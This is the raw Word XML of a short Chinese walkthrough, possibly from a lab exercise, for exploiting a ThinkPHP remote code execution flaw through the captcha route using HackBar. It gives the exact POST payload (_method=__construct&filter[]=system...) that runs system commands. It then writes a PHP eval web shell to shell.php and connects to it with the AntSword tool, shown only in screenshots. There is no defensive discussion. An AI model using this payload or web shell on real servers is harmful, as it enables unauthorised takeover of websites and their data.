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F6BB4" w14:textId="7AC82795" w:rsidR="00B17FE1" w:rsidRDefault="00F35ED2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35ED2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35ED2">
        <w:t>HackBar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>蚁剑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFBCBE8" w14:textId="77777777" w:rsidR="00F35ED2" w:rsidRDefault="00F35ED2"/>
    <w:p w14:paraId="7747F4DB" w14:textId="0A18683A" w:rsidR="00F35ED2" w:rsidRDefault="00F35ED2">
      <w:r w:rsidRPr="00F35ED2">
        <w:t>网站后拼接index.php/?s=captcha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168978DB" w14:textId="2339B8C3" w:rsidR="00F35ED2" w:rsidRDefault="00F35ED2">
      <w:r w:rsidRPr="00F35ED2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7871D027" wp14:editId="1A059237">
            <wp:extent cx="5274310" cy="2339975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="270864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46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FD56" w14:textId="4FE38E28" w:rsidR="00F35ED2" w:rsidRDefault="00F35ED2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35ED2">
        <w:t>HackBar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 后台输入语句</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35ED2">
        <w:t>：_method=__construct&amp;filter[]=system&amp;method=get&amp;server[REQUEST_METHOD]=pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AF7571" w14:textId="1B614749" w:rsidR="00F35ED2" w:rsidRDefault="00F35ED2">
      <w:r w:rsidRPr="00F35ED2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DF87DC1" wp14:editId="582DC7D9">
            <wp:extent cx="5274310" cy="1823720"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1082726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265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4E15" w14:textId="5FA16972" w:rsidR="00F35ED2" w:rsidRDefault="00F35ED2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7B126" w14:textId="127CE7C5" w:rsidR="00F35ED2" w:rsidRDefault="00F35ED2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给个马：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35ED2">
        <w:t>echo '&lt;?php eval($_POST[1]); ?&gt;' &gt; shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F2A393" w14:textId="09924C41" w:rsidR="00F35ED2" w:rsidRDefault="00F35ED2">
      <w:r w:rsidRPr="00F35ED2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C84225E" wp14:editId="3B4D30BA">
            <wp:extent cx="5274310" cy="1827530"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="802540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402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2F74" w14:textId="7B68F2BE" w:rsidR="00F35ED2" w:rsidRDefault="00F35ED2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>蚁剑</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E82E160" w14:textId="3602D20B" w:rsidR="00F35ED2" w:rsidRDefault="00F35ED2">
      <w:r w:rsidRPr="00F35ED2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2540AFE9" wp14:editId="19CD8A7F">
            <wp:extent cx="5274310" cy="4318000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="728130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30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0E92" w14:textId="58DEF8B2" w:rsidR="00F35ED2" w:rsidRDefault="00F35ED2">
      <w:r>
        <w:t>Over</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B3C6E7" w14:textId="7F66AAC1" w:rsidR="00F35ED2" w:rsidRDefault="00F35ED2">
      <w:r w:rsidRPr="00F35ED2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20B1B031" wp14:editId="3BE85AA8">
            <wp:extent cx="5274310" cy="3551555"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="933533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334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FE1"/>
    <w:rsid w:val="00700793"/>
    <w:rsid w:val="00B17FE1"/>
    <w:rsid w:val="00F3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F1FB15"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3A6C60F4-8E79-0A46-80A2-5C893295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17FE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F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FE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FE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FE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FE1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FE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FE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FE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17FE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17F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17F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17FE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17FE1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17FE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17FE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17FE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17FE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17FE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17F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7FE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17FE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7F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17FE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7FE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17FE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17F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17FE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17F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威</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>威</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-26T05:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-26T05:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>